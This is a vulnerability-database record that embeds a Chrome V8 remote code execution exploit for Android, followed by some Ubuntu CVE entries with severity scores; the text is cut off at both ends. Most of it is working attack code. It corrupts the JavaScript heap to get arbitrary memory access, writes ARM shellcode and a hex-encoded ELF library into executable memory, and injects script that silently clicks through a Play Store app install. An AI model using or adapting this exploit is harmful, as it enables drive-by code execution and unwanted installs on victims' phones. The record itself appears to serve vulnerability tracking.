\ndArray[i]=str_to_double(\"%03x%03x\"); \n} \n \nvar occulen = 0; \nvar i = 0; \nvar savedChunk = new Uint8Array(0x8100); \nvar hiddenValue = getHiddenValue(); \nvar arr=[]; \nfillNewSpace(new String); \nfindNewSpace(); \nvar classStr = 'class x extends Array{}'; \nfor(var i=0;i<classStr.length;i++){ \narr[i]=classStr.charCodeAt(i); \n} \nvar magicStr = String.fromCharCode(0x86,0x24); \nclassStr=String.fromCharCode.apply(null,arr); \nvar ab = new ArrayBuffer(0x1243); \nvar fun = eval(classStr); \nObject.assign(fun,hiddenValue); \nvar oobStr = fun.toString(); \n \n/*(gdb) x/20xw 0x5600c45c array buffer layout \n* 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020 \n* 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000 \n*/ \n//overwrite huge string as array buffer \nvar abLengthIndex = oobStr.indexOf(magicStr); \nvar strArrayBuffer = oobStr.substr(abLengthIndex-12,32); \n//replace the byteLength \nvar LengthAddr = getObjAddr(lengthInOldSpace); \nvar strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24); \nvar strBase = \"\\x00\\x00\\x00\\x00\"; \nstrArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12); \nstrArrayBuffer = myencode(strArrayBuffer); \nfor(var i=0;i<strArrayBuffer.length/8;i++){ \nvar d = strArrayBuffer.substr(i*8,8); \ndArray[index/8+i] = str_to_double(d); \n} \n \nvar classStrAddr = getObjAddr(classStr)>>>0; \n//set read position \nvar readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head \n//length control the length of unscaped string, generated string has 12 bytes head \n//left 0x1000*2 bytes to avoid gc \nvar subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000); \n \n//save the the chunk head to be corrupted \nvar nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12; \nvar savedThunkStr = oobStr.substr(nextThunkOffset,0x8100); \nfor(var i =0;i<savedThunkStr.length;i++){ \nsavedChunk[i] = savedThunkStr.charCodeAt(i); \n} \n \nvar pos1=new String; \nvar pos1addr = getObj24BitsAddr(pos1)-1; \n \n//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray \nocculen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff); \n//minus the length of double array \nif(occulen<0x40000+16+8) \nthrow \"no enough room\"; \nocculen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray \nif(occulen%4!==0) \nthrow \"length don't align\"; \nvar arrocc=new Array((occulen/4)); \n//set unescape write position \nvar occDoubleArray = dArray.concat(); \n \nvar b=unescape(subOobStr); \n//restore the corrupted chunk head \nvar u8 = new Uint8Array(selectedStr,nextTrunk,0x8100); \nfor(var i=0;i<savedChunk.length;i++){ \nu8[i] = savedChunk[i]; \n} \n \nprint(\"long string allocated at \"+classStrAddr.toString(16)); \nif(typeof(selectedStr)===\"string\"){ \nprint(\"overwrite failed\"); \npostMessage(false); \nclose(); \nreturn; \n//throw \"overwrite failed\"; \n} \nvar fakeab = selectedStr; \nprint(\"faked array buffer byte length is \"+fakeab.byteLength.toString(16)); \nvar globaldv = new Uint32Array(fakeab); \n \nfunction read_uint32(from_address){ \nvar u32 = globaldv[(from_address/4)>>>0]; \nreturn u32>>>0; \n} \n \n \nfunction read_uint8(from_address){ \nfrom_address = from_address>>>0; \nvar index = (from_address/4)>>>0; \nvar mask = from_address%4; \nvar u32 = globaldv[index]; \nu32 = u32<<8*(3-mask); \nreturn u32>>>24; \n} \n \nfunction read_uint32_unalign(from_address){ \nvar u32 = 0; \nfor(var i=3;i>=0;i--){ \nvar u8 = read_uint8(from_address+i); \nu32 = u32*0x100+u8; \n} \nreturn u32>>>0; \n} \n \n//rw to execute \n//get function point of v8::internal::Accessors::ReconfigureToDataProperty \nfunction getFixedFunctionPoint(fakeab){ \nvar FunctionAddress = getObjAddr(Function); \nvar u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000); \nvar map = u32[0]; \nu32 = new Uint32Array(fakeab,map-1,0x1000); \n//instance descriptors \nvar descriptors = u32[7]; \nu32 = new Uint32Array(fakeab,descriptors-1,0x1000); \nvar lengthAccessorInfo = u32[6]; \nu32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000); \nvar setterForeign = u32[4]; \nu32 = new Uint32Array(fakeab,setterForeign-1,0x1000); \nvar functionPoint = u32[1]; \nreturn functionPoint-1; \n} \n \nvar funPoint = getFixedFunctionPoint(fakeab); \nprint(\"ReconfigureToDataProperty at\"+funPoint.toString(16)); \nvar pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval \n \nvar point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000 \nprint(\"chrome.apk base at \"+point.toString(16)); \n \nfunction find(startAddr,len,pattern){ \nfor(var i=0; i<(len-pattern.length); i++ ) { \nfor(var j=0;j<pattern.length;j++){ \nvar temp = read_uint8(startAddr+i+j); \n//print(temp.toString(16)); \nif(temp!=pattern[j]) break; \n} \nif(j==pattern.length) return startAddr+i; \n} \nprint(\"find failed\"); \n} \nvar pattern_position=find(point,0x10000000,pattern); \n \nprint(\"find pattern at \"+to_hex(pattern_position)); \n \n \n \n \n \nfunction get_dest_from_blx(addr) { \nvar val = read_uint32_unalign(addr); \nvar s = (val & 0x400) >> 10; \nvar i1 = 1 - (((val & 0x20000000) >> 29) ^ s); \nvar i2 = 1 - (((val & 0x8000000) >> 27) ^ s); \nvar i10h = val & 0x3ff; \nvar i10l = (val & 0x7fe0000) >> 17; \nvar off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2); \nreturn ((addr + 4) & ~3) + off; \n} \n \nfunction backup_original_code(start_address){ \nvar backup_arr = []; \nset_access_address(start_address); \nvar u8arr=new Uint8Array(faked_ab); \nfor(var i=0;i<shellcode.length+4096;i++){ \nbackup_arr[i]=u8arr[i]; \n} \nreturn backup_arr; \n} \n \nfunction restore_original_code(start_address,backup_arr){ \nset_access_address(start_address); \nvar u8arr=new Uint8Array(faked_ab); \nfor(var i=0;i<shellcode.length+4096;i++){ \nu8arr[i]=backup_arr[i]; \n} \n} \n \n \nhuge_func({}); \nprint(\"blx instruction content is \"+to_hex(read_uint32_unalign(pattern_position-4))); \nvar dlsym_addr = get_dest_from_blx(pattern_position-4); \nprint(\"dlsym address is \"+to_hex(dlsym_addr)); \nvar huge_func_address = getObjAddr(huge_func)-1; \nprint(\"huge func address is \"+to_hex(huge_func_address)); \nfor(var i=0;i<20;i++){ \nprint(to_hex(read_uint32(huge_func_address+i*4))); \n} \nvar huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4 \nprint(\"huge func code entry is \"+to_hex(huge_func_code_entry)); \nprint(to_hex(read_uint32(huge_func_code_entry))); \n \n//var so_str= \"\"; \nvar shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,0x1c,0x90,0x9d,0xe5,0x39,0xff,0x2f,0xe1,0x18,0x80,0x9d,0xe5,0x30,0x00,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x70,0x10,0x8d,0xe2,0x30,0xb0,0x9d,0xe5,0x02,0x00,0xa0,0xe3,0x04,0x70,0x98,0xe5,0x00,0x30,0x98,0xe5,0x00,0x70,0x8d,0xe5,0x3b,0xff,0x2f,0xe1,0x60,0x10,0x8d,0xe2,0x1c,0x50,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x35,0xff,0x2f,0xe1,0x00,0x20,0xa0,0xe1,0x70,0x10,0x8d,0xe2,0x02,0x30,0xa0,0xe1,0x02,0x00,0xa0,0xe3,0x00,0x20,0x8d,0xe5,0xe8,0x20,0x8d,0xe2,0x3b,0xff,0x2f,0xe1,0x98,0x10,0x8d,0xe2,0x1c,0x40,0x9d,0xe5,0x10,0x00,0x9d,0xe5,0x34,0xff,0x2f,0xe1,0x00,0xa0,0xa0,0xe1,0x18,0x00,0x9d,0xe5,0x07,0x20,0xa0,0xe3,0x0b,0x1a,0xa0,0xe3,0x10,0x50,0x90,0xe5,0xff,0xce,0xc5,0xe3,0x05,0x4a,0x85,0xe2,0x0f,0x30,0xcc,0xe3,0x01,0x0a,0x83,0xe2,0x3a,0xff,0x2f,0xe1,0xbc,0x72,0xd5,0xe1,0x1c,0x90,0x95,0xe5,0x06,0x00,0x57,0xe1,0x09,0x20,0x85,0xe0,0x06,0x00,0x00,0x1a,0x1b,0x00,0x00,0xea,0x65,0x78,0x70,0x6c,0x6f,0x69,0x74,0x00,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0x15,0x00,0x00,0x2a,0x00,0xe0,0x92,0xe5,0x01,0x00,0x5e,0xe3,0xf8,0xff,0xff,0x1a,0x10,0x80,0x92,0xe5,0x00,0x00,0x58,0xe3,0xf5,0xff,0xff,0x0a,0x00,0x00,0xa0,0xe3,0x04,0x70,0x92,0xe5,0x00,0xb0,0x85,0xe0,0x00,0xa0,0x84,0xe0,0x08,0x10,0x92,0xe5,0x01,0x00,0x80,0xe2,0x07,0xc0,0xdb,0xe7,0x01,0xc0,0xca,0xe7,0x10,0x30,0x92,0xe5,0x03,0x00,0x50,0xe1,0xf5,0xff,0xff,0x3a,0xbc,0x72,0xd5,0xe1,0x01,0x60,0x86,0xe2,0x20,0x20,0x82,0xe2,0x07,0x00,0x56,0xe1,0xe9,0xff,0xff,0x3a,0x5f,0xe0,0xa0,0xe3,0x1f,0x0b,0x1f,0xed,0x61,0xb0,0xa0,0xe3,0x72,0x60,0xa0,0xe3,0x00,0x90,0xa0,0xe3,0x10,0x00,0x9d,0xe5,0x64,0xa0,0xa0,0xe3,0x74,0x70,0xa0,0xe3,0x10,0xe1,0xcd,0xe5,0x6e,0x80,0xa0,0xe3,0x69,0x30,0xa0,0xe3,0x11,0xe1,0xcd,0xe5,0x6f,0xc0,0xa0,0xe3,0x6c,0x20,0xa0,0xe3,0x19,0xe1,0xcd,0xe5,0x1d,0xe1,0xcd,0xe5,0x67,0xe0,0xa0,0xe3,0x1e,0x0b,0x8d,0xed,0x12,0xb1,0xcd,0xe5,0x70,0xb0,0xa0,0xe3,0x11,0x1e,0x8d,0xe2,0x14,0xa1,0xcd,0xe5,0x18,0xa1,0xcd,0xe5,0x15,0x61,0xcd,0xe5,0x1f,0x61,0xcd,0xe5,0x16,0xc1,0xcd,0xe5,0x1b,0xc1,0xcd,0xe5,0x1c,0xc0,0x9d,0xe5,0x17,0x31,0xcd,0xe5,0x20,0x31,0xcd,0xe5,0x1a,0x21,0xcd,0xe5,0x1c,0xe1,0xcd,0xe \nvar so_str = \"7f454c460101010000000000000000000300280001000000000000003400000044110000000000053400200008002800150014000600000034000000340000003400000000010000000100000400000004000000030000003401000034010000340100001300000013000000040000000100000001000000000000000000000000000000d80d0000d80d0000050000000010000001000000a40e0000a41e0000a41e00006c01000082010000060000000010000002000000a80e0000a81e0000a81e00002801000028010000060000000400000051e574640000000000000000000000000000000000000000060000000000000001000070d40c0000d40c0000d40c00002000000020000000040000000400000052e57464a40e0000a41e0000a41e00005c0100005c01000006000000040000002f73797374656d2f62696e2f6c696e6b657200000000000000000000000000000000000001000000000000000000000012000000100000000000000000000000120000001d00000000000000000000001200000034000000000000000000000012000000480000000000000000000000120000004f000000000000000000000012000000560000000000000000000000120000005d000000a00800003404000012000800650000000000000000000000120000006e0000000000000000000000120000007f0000000000000000000000110000009100000010200000000000001000f1ff9800000010200000000000001000f1ffa400000026200000000000001000f1ff005f5f6378615f66696e616c697a65005f5f6378615f617465786974005f5f61656162695f756e77696e645f6370705f707230005f5f616e64726f69645f6c6f675f7072696e74006d616c6c6f63006d656d736574006d656d63707900736f5f6d61696e006d70726f74656374005f5f737461636b5f63686b5f6661696c005f5f737461636b5f63686b5f6775617264005f6564617461005f5f6273735f7374617274005f656e64006c6962632e736f006c69626d2e736f006c6962737464632b2b2e736f006c69626d656469616e646b2e736f006c69627574696c732e736f006c696262696e6465722e736f006c69626d656469612e736f006c696273746167656672696768742e736f006c696273746167656672696768745f666f756e646174696f6e2e736f006c6962637574696c732e736f006c6962696e7075742e736f006c6962646c2e736f006c6962616e64726f69645f72756e74696d652e736f0072636532757873732e736f00000000030000000f0000000c0000000e0000000d0000000000000000000000000000000200000001000000040000000000000006000000050000000800000007000000030000000a000000090000000b000000a41e0000170000000020000017000000d01f0000150b0000e01f000016010000e41f000016020000e81f000016040000ec1f000016050000f01f000016060000f41f000016070000f81f000016090000fc1f0000160a000004e02de504e09fe50ee08fe008f0bee5741b000000c68fe201ca8ce274fbbce500c68fe201ca8ce26cfbbce500c68fe201ca8ce264fbbce500c68fe201ca8ce25cfbbce500c68fe201ca8ce254fbbce500c68fe201ca8ce24cfbbce500c68fe201ca8ce244fbbce500c68fe201ca8ce23cfbbce500482de904b08de20c309fe503308fe00300a0e1e1ffffeb0088bde8281b000000482de904b08de208d04de208000be508301be5000053e30100000a08301be533ff2fe104d04be20088bde800482de904b08de208d04de208000be528309fe503308fe00300a0e108101be51c309fe503308fe00320a0e1cbffffeb0030a0e10300a0e104d04be20088bde8b8ffffffc41a000020d04de20c008de508108de504208de500308de50030a0e31730cde50030a0e318308de5210000ea0030a0e31c308de50030a0e31c308de50f0000ea18209de51c309de5033082e004209de5033082e00020d3e50c109de51c309de5033081e00030d3e5030052e10000000a060000ea1c309de5013083e21c308de51c209de508309de5030052e1ebffff3a1c209de508309de5030052e10100001a18309de5090000ea18309de5013083e218308de518209de508309de5032082e000309de5030052e1d7ffff9a0030e0e30300a0e120d08de21eff2fe104e02de524d04de20c008de508108de514329fe503308fe0003093e50320a0e108329fe503308fe002c0a0e10700b3e800008ce504108ce508208ce5f0319fe503308fe00030d3e5013023e27330efe6000053e36900000ad8319fe503308fe00120a0e30020c3e508309de500308de50600a0e3c0319fe503308fe00310a0e1b8319fe503308fe00320a0e10c309de56dffffeb08309de5003093e510308de510309de5043083e2003093e514308de510309de50c3083e218308de518309de500308de50600a0e374319fe503308fe00310a0e16c319fe503308fe00320a0e114309de558ffffeb5c319fe503308fe0002093e514309de5033082e00300a0e154ffffeb0030a0e11c308de53c319fe503308fe0002093e514309de5033082e01c009de50010a0e30320a0e14cffffeb10309de51c009de50310a0e10c20a0e34affffeb1c309de50c1083e200319fe503308fe0002093e5f8309fe503308fe0003093e50100a0e10210a0e10320a0e13effffebe0309fe503308fe0003093e50c3083e21c209de5032082e018309de50200a0e10310a0e114209de533ffffeb1c309de5043083e2b0209fe502208fe0001092e514209de5022081e0002083e51c309de5043083e20 \nvar arrayBuffer = new ArrayBuffer(0x1000000); \nvar arrayBufferAddress = getObjAddr(arrayBuffer)-1; \nvar backingStoreAddress = read_uint32(arrayBufferAddress+4*4); \nvar args_address = backingStoreAddress+1024; \nfunction write_shellcode(dlsym_addr,buffer){ \n//ldr r0,[pc,4]//0xe59f0004 \n//ldr r1,[pc,4]//0xe59f1004 \n//b shellcode;//0xea000001 \n//dlopen_addr//array_buffer_address \n//dlsym_addr \n//shellcode \n//var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr]; \nvar stub=[0xe59f0004,0xe59f1004,0xea000001,args_address,0x1000000]; \nfor(var i=0;i<stub.length;i++){ \nglobaldv[buffer/4+i]=stub[i]; \n} \n \nshellcode = shellcode.concat([0,0,0,0]); \nfor(var i=0;i<shellcode.length/4>>>0;i++){ \n// u8arr[i+4*stub.length]=shellcode[i]; \nglobaldv[buffer/4+stub.length+i] = (shellcode[4*i+3]<<24)+(shellcode[4*i+2]<<16)+(shellcode[4*i+1]<<8)+(shellcode[4*i]); \n} \nreturn stub.length*4+shellcode.length; \n} \n \nfunction xss_code(){ \n//alert(navigator.userAgent); \n//alert(document.cookie); \nvar i1=setInterval(function(){ \nif(!(document&&document.body&&document.body.innerHTML&&document.body.innerHTML.match(/This app is compatible/)!=null)){ \nconsole.log(\"wait load complete\"); \nreturn; \n} \nclearInterval(i1); \nvar i2=setInterval(function(){ \ndocument.getElementsByClassName(\"price buy id-track-click\")[0].click(); \nvar installButton = document.getElementById(\"purchase-ok-button\"); \nif(installButton == null) \nreturn; \ninstallButton.click(); \ndocument.write(\"<h1>The app will be installed shortly, Pwned by 360 Alpha Team</h1>\"); \nclearInterval(i2); \nsetTimeout(function(){ \nwindow.open(\"intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end\"); \n},26000); \n},500); \n},500); \n} \n \nvar js_str=\"\\n\"+xss_code.toString()+\"xss_code();\\n\"; \n//var backup_arr = backup_original_code(huge_func_code_entry); \nvar writed_len = write_shellcode(dlsym_addr,huge_func_code_entry); \nvar args_view = new DataView(arrayBuffer,1024,100); \nvar so_file_view = new DataView(arrayBuffer,4096); \nvar js_view = new DataView(arrayBuffer,0x100000); \nargs_view.setUint32(0,dlsym_addr+0xc,true); \nargs_view.setUint32(4,dlsym_addr,true); \nargs_view.setUint32(8,huge_func_code_entry,true); \nargs_view.setUint32(12,writed_len,true); \nargs_view.setUint32(16,backingStoreAddress+4096,true); \nargs_view.setUint32(20,so_str.length/2,true); \nargs_view.setUint32(24,backingStoreAddress+0x100000,true); \nargs_view.setUint32(28,js_str.length,true); \nprint(\"length is \"+so_str.length); \nfor(var i=0;i<so_str.length;i+=2){ \nvar value = so_str.substr(i,2); \nvalue = \"0x\"+value; \nso_file_view.setUint8(i/2,parseInt(value)); \n} \nfor(var i=0;i<js_str.length;i++){ \njs_view.setUint8(i,js_str.charCodeAt(i)); \n} \n \nprint(\"begin execute shellcode\"); \nhuge_func({}); \n \nprint(\"done\"); \npostMessage(true); \n//prevent arrayBuffer to be released \nwhile(1){} \n \n} \n//main world \nfunction print(){ \nconsole.log.apply(null,arguments); \ndocument.write('<p >'); \ndocument.write.apply(document,arguments); \ndocument.write(\"<p>\"); \n} \n \n// Build a worker from an anonymous function body \nvar blobURL = URL.createObjectURL( new Blob([ '(',exploit.toString(),')()' ], { type: 'application/javascript' } ) ); \n \nvar worker; \nvar exploitSucc = false; \nvar count = 0; \nfunction startExploit(){ \nprint(\"worker thread is started\"); \nworker = new Worker( blobURL ); \ncount++; \nworker.onmessage = function(e){ \nprint(\"exploit result is \"+e.data); \nexploitSucc = e.data; \nif(exploitSucc==false){ \nstartExploit(); \nreturn; \n} \nvar end = +new Date(); \nprint(\"time diff is \"+(end-begin)/1000); \n//top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android'; \ntop.location='https://play.google.com/store/apps/details?id=com.kitkats.qrscanner'; \n} \n} \nvar begin = +new Date(); \nstartExploit(); \n \nvar savedCount = 0; \nvar hangMonitor = setInterval(function (){ \nif(exploitSucc==true){ \nclearInterval(hangMonitor); \n}else{ \nif(savedCount==count){//maybe hang \nprint(\"worker maybe hange\"); \nworker.terminate(); \nstartExploit(); \n}else{ \nprint(\"worker is normal\"); \nsavedCount = count; \n} \n} \n},10000); \n//URL.revokeObjectURL( blobURL ); \n \n \n</script> \n</html> \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/142939/googlechromev8-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntucve": [{"lastseen": "2021-11-22T21:45:13", "description": "A missing check for whether a property of a JS object is private in V8 in\nGoogle Chrome prior to 55.0.2883.75 allowed a remote attacker to execute\narbitrary code inside a sandbox via a crafted HTML page.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[mikesalvatore](<https://launchpad.net/~mikesalvatore>) | The Ubuntu Security Team does not support libv8\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9651", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9651"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-9651", "href": "https://ubuntu.com/security/CVE-2016-9651", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-22T21:45:12", "description": "Incorrect handling of invalid URLs in Google Chrome prior to 55.0.2883.75\nfor Mac, Windows and Linux, and 55.0.2883.84 for Android allowed a remote\nattacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML\npage.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5222", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5222"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5222", "href": "https://ubuntu.com/security/CVE-2016-5222", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:45:13", "description": "Blink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux,\nand 55.0.2883.84 for Android incorrectly handled iframes, which allowed a\nremote attacker to bypass a no-referrer policy via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9650", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9650"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-9650", "href": "https://ubuntu.com/security/CVE-2016-9650", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:45:12", "description": "A timing attack on denormalized floating point arithmetic in SVG filters in\nBlink in Google Chrome prior to 55.0.2883.75 for Mac, Windows and Linux,\nand 55.0.2883.84 for Android allowed a remote attacker to bypass the Same\nOrigin Policy via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 4.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 1.4}, "published": "2016-12-06T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5224", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5224"], "modified": "2016-12-06T00:00:00", "id": "UB:CVE-2016-5224", "href": "https://ubuntu.com/security/CVE-2016-5224", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2021-11-22T21:44:34", "description": "Heap buffer overflow during TIFF image parsing in PDFium in Google Chrome\nprior to 